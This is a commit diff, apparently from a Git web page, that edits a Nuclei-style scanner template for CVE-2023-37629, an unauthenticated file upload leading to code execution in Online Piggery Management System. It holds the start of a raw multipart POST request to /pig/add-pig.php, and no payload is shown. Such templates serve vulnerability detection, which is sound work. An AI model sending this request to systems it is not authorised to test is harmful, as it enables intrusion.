info update
parent
3518319d95
commit
74eff31e1d
|
@ -1,6 +1,7 @@
|
|||
id: CVE-2023-37629
|
||||
|
||||
info:
|
||||
name: Online Piggery Management System v1.0 - unauthenticated file upload
|
||||
name: Online Piggery Management System v1.0 - Unauthenticated File Upload
|
||||
author: Harsh
|
||||
severity: critical
|
||||
description: |
|
||||
|
@ -15,7 +16,7 @@ info:
|
|||
cwe-id: CWE-434
|
||||
metadata:
|
||||
verified: true
|
||||
tags: fileupload,unauthenticated,exploitdb
|
||||
tags: cve,cve2023,fileupload,rce,opms
|
||||
|
||||
http:
|
||||
- raw:
|
||||
|
@ -23,6 +24,7 @@ http:
|
|||
POST /pig/add-pig.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=---------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
|
||||
|
||||
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
|
||||
Content-Disposition: form-data; name="pigno"
|
||||
|
||||
|
|
Loading…
Reference in New Issue